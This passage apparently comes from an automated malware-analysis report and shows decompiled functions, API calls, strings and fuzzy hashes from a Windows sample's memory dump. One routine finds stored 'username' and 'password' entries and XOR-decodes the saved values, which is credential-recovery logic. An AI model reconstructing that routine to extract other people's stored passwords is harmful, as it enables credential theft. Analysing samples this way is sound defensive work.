				void* _t13;

				_t3 = E004069D3(_a4);
				if(_t3 != 0) {
					0x413d0c(0x41e200, _a4, _t10, _t13);
					0x413d0c(0x41e308, "general");
					_t4 = GetPrivateProfileIntA(0x41e308, "rtl", 0, 0x41e200);
					asm("sbb eax, eax");
					 *0x41e34c =  ~(_t4 - 1) + 1;
					 *0x41e350 = 0;
					return GetPrivateProfileStringA(0x41e308, "charset", 0x417c88, 0x41e350, 0x3f, 0x41e200);
				}
				return _t3;
			}

0x00408fc0
0x00408fc8
0x00408fd6
0x00408fe6
0x00408ff7
0x0040900d
0x00409016
0x0040901b
0x00000000
0x00409029
0x0040902a

APIs

Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7

_mbscpy.MSVCRT ref: 00408FD6
_mbscpy.MSVCRT ref: 00408FE6
GetPrivateProfileIntA.KERNEL32(0041E308,rtl,00000000,0041E200), ref: 00408FF7
GetPrivateProfileStringA.KERNEL32(0041E308,charset,00417C88,0041E350,0000003F,0041E200), ref: 00409022

Strings

charset, xrefs: 0040900F
rtl, xrefs: 00408FF1
general, xrefs: 00408FDB

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfile_mbscpy$AttributesFileString
String ID: charset$general$rtl
API String ID: 888011440-3784062100
Opcode ID: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
Instruction ID: ef4fb33988e1ec7767552a7ed3f3ae2affcfc9826048e3bb16e6b0e4c8ee98e3
Opcode Fuzzy Hash: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
Instruction Fuzzy Hash: 2CF0B43568020879E3111712AC0AFFB6E68EB86F11F18843FBC14921D1D67D494185AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405865, Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 202
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00405865(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char* _v12;
				intOrPtr* _v16;
				int _v20;
				char _v22;
				char _v23;
				signed int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v172;
				char _v300;
				char _v1319;
				char _v1320;
				char _v1321;
				char _v1322;
				void _v1323;
				char _v1324;
				void _v1547;
				void _v1580;
				void* __ebx;
				void* __edi;
				void* _t90;
				void* _t98;
				int _t106;
				signed int _t112;
				signed int _t118;
				void* _t119;
				intOrPtr* _t128;
				void* _t129;
				void* _t130;
				void* _t132;
				signed int _t136;
				int _t147;
				signed int* _t152;
				void* _t153;
				void* _t154;
				void* _t155;

				_t130 = __ecx;
				_v36 = 0;
				_v1324 = 0;
				memset( &_v1323, 0, 0x3ff);
				_v44 = 0xffff;
				_v40 = 0xffff;
				_v300 = 0;
				_v172 = 0;
				_v20 = 0;
				_v32 = 0;
				_v28 = 0;
				_t90 = E00407193(_a8, _t130,  &_v1324, 0x3ff,  &_v36);
				_t155 = _t154 + 0x18;
				while(_t90 != 0) {
					if(_v20 == _v44 + 2) {
						_push( &_v1323);
						_t129 = 0x7f;
						_v32 = 1;
						E00406958(_t129,  &_v300);
					}
					if(_v20 == _v40 + 2) {
						_v28 = 1;
						_t106 = strlen( &_v1324);
						if(_v1323 == 0x27) {
							_t24 = _t106 - 3; // -3
							if(_t24 <= 0x7c &&  *((char*)(_t153 + _t106 - 0x529)) == 0x27) {
								_t136 = 8;
								memcpy( &_v1580, 0x418128, _t136 << 2);
								asm("movsb");
								_t147 = 0;
								memset( &_v1547, 0, 0xdf);
								memset( &_v172, 0, 0x80);
								_t112 = _v1322;
								_t155 = _t155 + 0x24;
								if(_t112 != 0x27) {
									_v16 =  &_v1322;
									_v8 =  &_v1319;
									_t128 =  &_v1320;
									_v12 =  &_v1321;
									while(_t112 != 0) {
										if(_t112 != 0x5c) {
											_v12 = _v12 + 1;
											_v8 = _v8 + 1;
											_t152 = _t153 + _t147 - 0xa8;
											_t128 = _t128 + 1;
											_v16 = _v16 + 1;
											 *_t152 = _t112;
										} else {
											_t118 =  *_t128;
											if( *_v12 != 0x78) {
												if(_t118 == 0x66) {
													_t118 = _t118 + 0xa6;
												}
												if(_t118 == 0x72) {
													_t118 = _t118 + 0x9b;
												}
												if(_t118 == 0x30) {
													_t118 = 0;
												}
												if(_t118 == 0x6e) {
													_t118 = _t118 + 0x9c;
												}
												if(_t118 == 0x74) {
													_t118 = _t118 + 0x95;
												}
												if(_t118 == 0x76) {
													_t118 = _t118 + 0x95;
												}
												if(_t118 == 0x61) {
													_t118 = _t118 + 0xa6;
												}
												if(_t118 == 0x62) {
													_t118 = _t118 + 0xa6;
												}
												_t152 = _t153 + _t147 - 0xa8;
												_push(2);
											} else {
												_v24 = _t118;
												_v23 =  *_v8;
												_v22 = 0;
												_t152 = _t153 + _t147 - 0xa8;
												_t118 = E00406D5A( &_v24);
												_push(4);
											}
											 *_t152 = _t118;
											_pop(_t119);
											_v12 = _v12 + _t119;
											_v8 = _v8 + _t119;
											_t128 = _t128 + _t119;
											_v16 = _v16 + _t119;
										}
										 *_t152 =  *(_t153 + _t147 - 0x628) ^  *_t152 ^ 0x00000031;
										_t112 =  *_v16;
										_t147 = _t147 + 1;
										if(_t112 != 0x27) {
											continue;
										}
										goto L33;
									}
								}
							}
						}
					}
					L33:
					if(_v32 != 0 && _v28 != 0) {
						 *((intOrPtr*)( *_a4))( &_v300);
						_v32 = 0;
						_v28 = 0;
						_v172 = 0;
						_v300 = 0;
					}
					if(E004070E4( &_v1324, ?str?) >= 0) {
						_v44 = _v20;
					}
					_t98 = E004070E4( &_v1324, "S'password'");
					_pop(_t132);
					if(_t98 >= 0) {
						_v40 = _v20;
					}
					_v20 = _v20 + 1;
					_t90 = E00407193(_a8, _t132,  &_v1324, 0x3ff,  &_v36);
					_t155 = _t155 + 0xc;
				}
				return _t90;
			}

0x00405865
0x00405881
0x00405884
0x0040588a
0x00405894
0x00405897
0x004058a4
0x004058aa
0x004058b1
0x004058b4
0x004058b7
0x004058be
0x004058c3
0x00405ad9
0x004058d4
0x004058dc
0x004058df
0x004058e6
0x004058ed
0x004058f2
0x004058fc
0x00405909
0x00405910
0x0040591d
0x00405923
0x00405929
0x0040593f
0x0040594b
0x0040594d
0x00405953
0x0040595d
0x0040596f
0x00405974
0x0040597a
0x0040597f
0x0040598b
0x00405994
0x0040599d
0x004059a3
0x004059a6
0x004059b0
0x00405a29
0x00405a2c
0x00405a2f
0x00405a36
0x00405a37
0x00405a3a
0x004059b2
0x004059b8
0x004059ba
0x004059e2
0x004059e4
0x004059e4
0x004059e8
0x004059ea
0x004059ea
0x004059ee
0x004059f0
0x004059f0
0x004059f4
0x004059f6
0x004059f6
0x004059fa
0x004059fc
0x004059fc
0x00405a00
0x00405a02
0x00405a02
0x00405a06
0x00405a08
0x00405a08
0x00405a0c
0x00405a0e
0x00405a0e
0x00405a10
0x00405a17
0x004059bc
0x004059bc
0x004059c4
0x004059cb
0x004059cf
0x004059d6
0x004059dc
0x004059dc
0x00405a19
0x00405a1b
0x00405a1c
0x00405a1f
0x00405a22
0x00405a24
0x00405a24
0x00405a47
0x00405a4c
0x00405a4e
0x00405a51
0x00000000
0x00000000
0x00000000
0x00405a51
0x004059a6
0x0040597f
0x00405929
0x0040591d
0x00405a57
0x00405a5c
0x00405a6f
0x00405a71
0x00405a74
0x00405a77
0x00405a7e
0x00405a7e
0x00405a98
0x00405a9d
0x00405a9d
0x00405aab
0x00405ab2
0x00405ab3
0x00405ab8
0x00405ab8
0x00405abe
0x00405ad1
0x00405ad6
0x00405ad6
0x00405ae5

APIs

memset.MSVCRT ref: 0040588A
strlen.MSVCRT ref: 00405910
memset.MSVCRT ref: 0040595D
memset.MSVCRT ref: 0040596F

Strings

S'username', xrefs: 00405A85
', xrefs: 00405915
', xrefs: 0040592F
S'password', xrefs: 00405AA0

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$strlen
String ID: '$'$S'password'$S'username'
API String ID: 3337090206-859024053
Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC28, Relevance: 12.1, APIs: 8, Instructions: 108
windowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AC28(void* __eax) {
				void* _v36;
				long _v40;
				intOrPtr _v44;
				intOrPtr _v52;
				void* _v68;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;

				_t40 =  *0x415030; // 0x74191ab0
				_t47 = __eax;
				_t44 =  *0x415040; // 0x74192040
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 =  *_t40(0x10, 0x10, 0x19, 1, 1);
					 *(__eax + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(__eax + 0x184), 0x1003, 1,  *(__eax + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x41dbd4, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x41dbd4, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_t45 =  *0x41503c; // 0x741923b0
				_v40 = _t26;
				 *_t45( *(_t47 + 0x188), _v44, _t26);
				 *_t45( *(_t47 + 0x188), _t42, _v52);
				DeleteObject(_v68);
				DeleteObject(_t42);
				return SendMessageA(E00405068( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}

0x0040ac2b
0x0040ac39
0x0040ac43
0x0040ac49
0x0040ac55
0x0040ac5a
0x0040ac60
0x0040ac75
0x0040ac75
0x0040ac7e
0x0040ac8a
0x0040ac8f
0x0040ac95
0x0040acaa
0x0040acaa
0x0040acb6
0x0040acbb
0x0040acc1
0x0040acf7
0x0040acfb
0x0040ad05
0x0040ad07
0x0040ad0b
0x0040ad11
0x0040ad1c
0x0040ad26
0x0040ad33
0x0040ad3f
0x0040ad42
0x0040ad68

APIs

SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
GetSysColor.USER32(0000000F), ref: 0040AD0B
DeleteObject.GDI32(?), ref: 0040AD3F
DeleteObject.GDI32(00000000), ref: 0040AD42
SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSend$DeleteImageLoadObject$Color
String ID:
API String ID: 3642520215-0
Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1D6, Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040D1ED
_strcmpi.MSVCRT ref: 0040D20E
_strcmpi.MSVCRT ref: 0040D22F
_strcmpi.MSVCRT ref: 0040D253

Strings

password, xrefs: 0040D208
protocol, xrefs: 0040D229
account, xrefs: 0040D24D
name, xrefs: 0040D1E7

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi
String ID: account$name$password$protocol
API String ID: 1439213657-933060687
Opcode ID: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
Instruction ID: 794633c49b8c9c94e8125cdebcfe219ffcc263fe4270280c1a3d0952be7122e7
Opcode Fuzzy Hash: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
Instruction Fuzzy Hash: EA2130B2608702ADE718DE7598407D6F7D4BF05715F20022FE66CD2180FB39A554CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3FF, Relevance: 12.1, APIs: 8, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3FF(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x140)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x390)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}

0x0040b40c
0x0040b41e
0x0040b434
0x0040b446
0x0040b447
0x0040b455
0x0040b460
0x0040b461
0x0040b470
0x0040b481
0x0040b4a1
0x0040b4c8
0x00000000
0x0040b4d8
0x0040b4da

APIs

GetClientRect.USER32(?,?), ref: 0040B41E
GetWindowRect.USER32(?,?), ref: 0040B434
GetWindowRect.USER32(?,?), ref: 0040B447
BeginDeferWindowPos.USER32(00000003), ref: 0040B464
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B481
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B4A1
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B4C8
EndDeferWindowPos.USER32(?), ref: 0040B4D1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Defer$Rect$BeginClient
String ID:
API String ID: 2126104762-0
Opcode ID: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
Instruction ID: fdc4126930c1b8f3c9151252813053957ee6f88c11e53af12b0e4d030a96b888
Opcode Fuzzy Hash: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
Instruction Fuzzy Hash: CA21D672900609FFDF12CFA8DD89FEEBBB9FB48310F108464FA55A2160C7316A519B24

Uniqueness

Uniqueness Score: -1.00%

Function 004072B5, Relevance: 12.0, APIs: 8, Instructions: 42
clipboardmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004072B5(void* _a4) {
				void* _t7;
				signed int _t10;
				int _t12;
				void* _t16;
				signed int _t18;
				void* _t21;

				_t21 = _a4;
				_t18 = 0;
				EmptyClipboard();
				if(_t21 != 0) {
					_t2 = strlen(_t21) + 1; // 0x1
					_t12 = _t2;
					_t7 = GlobalAlloc(0x2000, _t12);
					_t16 = _t7;
					if(_t16 != 0) {
						GlobalFix(_t16);
						memcpy(_t7, _t21, _t12);
						GlobalUnWire(_t16);
						_t10 = SetClipboardData(1, _t16);
						asm("sbb esi, esi");
						_t18 =  ~( ~_t10);
					}
				}
				CloseClipboard();
				return _t18;
			}

0x004072b6
0x004072bb
0x004072bd
0x004072c5
0x004072d0
0x004072d0
0x004072d9
0x004072df
0x004072e3
0x004072e6
0x004072ef
0x004072f8
0x00407301
0x0040730b
0x0040730d
0x0040730d
0x00407310
0x00407311
0x0040731b

APIs

EmptyClipboard.USER32 ref: 004072BD
strlen.MSVCRT ref: 004072CA
GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040BB80,?), ref: 004072D9
GlobalFix.KERNEL32(00000000), ref: 004072E6
memcpy.MSVCRT ref: 004072EF
GlobalUnWire.KERNEL32(00000000), ref: 004072F8
SetClipboardData.USER32(00000001,00000000), ref: 00407301
CloseClipboard.USER32 ref: 00407311

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
String ID:
API String ID: 2315226746-0
Opcode ID: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
Instruction ID: b56ddb85736e4a30ce9fec78ed7ee79c44370bf8c75140d3078b235505e53826
Opcode Fuzzy Hash: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
Instruction Fuzzy Hash: 7DF0B437A00619BBD3112BA1BC4CEDB7B2CDBC4B96B054179FE05D6152DA38980486F9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A129, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E0040A129(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				signed int _t51;
				char* _t53;
				intOrPtr* _t61;
				intOrPtr* _t65;
				signed int _t66;
				intOrPtr _t80;
				intOrPtr* _t87;
				signed int _t91;
				void* _t92;
				void* _t93;

				_t65 = __ebx;
				_t66 = 6;
				memcpy( &_v96, 0x4183e4, _t66 << 2);
				_t93 = _t92 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E004067EC(_a4, "<tr>");
				_t91 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t65 + 0x24)) + _t91 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t65 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t87 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t65 + 0x30))(4, _t91, _t87,  &_v28);
						0x41241f(_v28,  &_v68);
						 *((intOrPtr*)( *_t87))(_v8,  *(_t65 + 0x4c));
						0x41244b();
						 *((intOrPtr*)( *_t65 + 0x48))( *((intOrPtr*)(_t65 + 0x50)), _t87, _v8);
						_t61 =  *((intOrPtr*)(_t65 + 0x50));
						_t80 =  *_t61;
						if(_t80 == 0 || _t80 == 0x20) {
							0x413cf4(_t61, "&nbsp;");
						}
						0x4124d4( *((intOrPtr*)(_t65 + 0x54)),  *((intOrPtr*)(_t65 + 0x50)));
						sprintf( *(_t65 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t65 + 0x54)));
						E004067EC(_a4,  *(_t65 + 0x4c));
						_t93 = _t93 + 0x20;
						_t91 = _t91 + 1;
					} while (_t91 <  *((intOrPtr*)(_t65 + 0x20)));
				}
				return E004067EC(_a4, 0x417de8);
			}

0x0040a129
0x0040a133
0x0040a13c
0x0040a13c
0x0040a13e
0x0040a148
0x0040a149
0x0040a14a
0x0040a14b
0x0040a14c
0x0040a156
0x0040a157
0x0040a15c
0x0040a163
0x0040a169
0x0040a16c
0x0040a172
0x0040a17d
0x0040a180
0x0040a182
0x0040a182
0x0040a185
0x0040a188
0x0040a18c
0x0040a190
0x0040a194
0x0040a19e
0x0040a1a7
0x0040a1b1
0x0040a1c2
0x0040a1c7
0x0040a1d7
0x0040a1da
0x0040a1dd
0x0040a1e1
0x0040a1ee
0x0040a1f4
0x0040a1fe
0x0040a210
0x0040a21b
0x0040a220
0x0040a223
0x0040a224
0x0040a169
0x0040a23f

APIs

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

_mbscat.MSVCRT ref: 0040A1EE
sprintf.MSVCRT ref: 0040A210

Strings

 , xrefs: 0040A1E8
<td bgcolor=#%s nowrap>%s, xrefs: 0040A134
<td bgcolor=#%s>%s, xrefs: 0040A140
<tr>, xrefs: 0040A14E

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FileWrite_mbscatsprintfstrlen
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 1631269929-4153097237
Opcode ID: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
Instruction ID: f5ff55beaed6f71e33551b2c4209876a9ab5e20235427d51249a725151ce9b26
Opcode Fuzzy Hash: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
Instruction Fuzzy Hash: 68318231900209AFCF05DF54C8869DE7BB6FF44314F10416AFD11BB2A2DB76A955CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040876F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E0040876F(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t34;
				signed short _t38;
				signed int _t39;
				signed int _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				int _t55;
				void* _t56;
				int _t66;
				void* _t67;
				void* _t68;

				_t38 = __ebx;
				if( *0x41e448 == 0) {
					E004086ED();
				}
				_t39 =  *0x41e440; // 0xa
				_t17 = 0;
				if(_t39 <= 0) {
					L5:
					_t50 = 0;
				} else {
					while(1) {
						_t48 =  *0x41e438; // 0xb7bfd0
						if(_t38 ==  *((intOrPtr*)(_t48 + _t17 * 4))) {
							break;
						}
						_t17 = _t17 + 1;
						if(_t17 < _t39) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t46 =  *0x41e43c; // 0xb7c3d8
					_t50 =  *((intOrPtr*)(_t46 + _t17 * 4)) +  *0x41e430;
				}
				L6:
				if(_t50 != 0) {
					L22:
					_t18 = _t50;
				} else {
					if((_t38 & 0x00010000) == 0) {
						if( *0x41e200 == 0) {
							_t19 =  *0x41e450; // 0x1000
							_push(_t19 - 1);
							_push( *0x41e434);
							_push(_t38);
							_push(E004088C5());
							goto L16;
						} else {
							0x413d0c(0x41e308, "strings");
							_t30 = E00408BF9(_t38,  *0x41e434);
							_t56 = _t56 + 0x10;
							if(_t30 == 0) {
								L14:
								_t31 =  *0x41e450; // 0x1000
								_push(_t31 - 1);
								_push( *0x41e434);
								_push(_t38);
								goto L9;
							} else {
								_t55 = strlen( *0x41e434);
								if(_t55 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_t34 =  *0x41e450; // 0x1000
						_push(_t34 - 1);
						_push( *0x41e434);
						_push(_t38 & 0x0000ffff);
						L9:
						_push( *0x41dbd4);
						L16:
						_t55 = LoadStringA();
						_t66 = _t55;
					}
					if(_t66 <= 0) {
						L21:
						_t18 = 0x417c88;
					} else {
						_t23 =  *0x41e444; // 0x64
						_t8 = _t55 + 2; // 0x66
						_t67 = _t23 + _t8 -  *0x41e448; // 0x8000
						if(_t67 >= 0) {
							goto L21;
						} else {
							_t41 =  *0x41e440; // 0xa
							_t68 = _t41 -  *0x41e44c; // 0x100
							if(_t68 >= 0) {
								goto L21;
							} else {
								_t42 =  *0x41e430; // 0xb73fc8
								_t50 = _t23 + _t42;
								_t10 = _t55 + 1; // 0x1
								memcpy(_t50,  *0x41e434, _t10);
								_t26 =  *0x41e440; // 0xa
								_t43 =  *0x41e444; // 0x64
								_t47 =  *0x41e43c; // 0xb7c3d8
								 *((intOrPtr*)(_t47 + _t26 * 4)) = _t43;
								_t27 =  *0x41e440; // 0xa
								_t44 =  *0x41e438; // 0xb7bfd0
								 *(_t44 + _t27 * 4) = _t38;
								_t28 =  *0x41e444; // 0x64
								 *0x41e440 =  *0x41e440 + 1;
								 *0x41e444 = _t28 + _t55 + 1;
								if(_t50 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
						}
					}
				}
				return _t18;
			}

0x0040876f
0x00408776
0x00408778
0x00408778
0x0040877d
0x00408784
0x00408789
0x0040879b
0x0040879b
0x0040878b
0x0040878b
0x0040878b
0x00408794
0x00000000
0x00000000
0x00408796
0x00408799
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408799
0x004087c6
0x004087cf
0x004087cf
0x0040879d
0x0040879f
0x004088c0
0x004088c0
0x004087a5
0x004087ab
0x004087de
0x00408824
0x0040882a
0x0040882b
0x00408831
0x00408837
0x00000000
0x004087e0
0x004087ea
0x004087f6
0x004087fb
0x00408800
0x00408814
0x00408814
0x0040881a
0x0040881b
0x00408821
0x00000000
0x00408802
0x0040880d
0x00408812
0x00000000
0x00000000
0x00408812
0x00408800
0x004087ad
0x004087ad
0x004087b3
0x004087b4
0x004087bd
0x004087be
0x004087be
0x00408838
0x0040883e
0x00408840
0x00408840
0x00408842
0x004088b9
0x004088b9
0x00408844
0x00408844
0x00408849
0x0040884d
0x00408853
0x00000000
0x00408855
0x00408855
0x0040885b
0x00408861
0x00000000
0x00408863
0x00408863
0x00408869
0x0040886c
0x00408877
0x0040887c
0x00408881
0x00408887
0x0040888d
0x00408890
0x00408895
0x0040889b
0x0040889e
0x004088a6
0x004088b2
0x004088b7
0x00000000
0x00000000
0x00000000
0x00000000
0x004088b7
0x00408861
0x00408853
0x00408842
0x004088c4

APIs

_mbscpy.MSVCRT ref: 004087EA

Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A

strlen.MSVCRT ref: 00408808
LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
memcpy.MSVCRT ref: 00408877

Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761

Strings

strings, xrefs: 004087E0
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
API String ID: 4036804644-4125592482
Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD2E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,7614F420,00000000), ref: 0040FD62
RegCloseKey.ADVAPI32(?,?,7614F420,00000000), ref: 0040FE4D

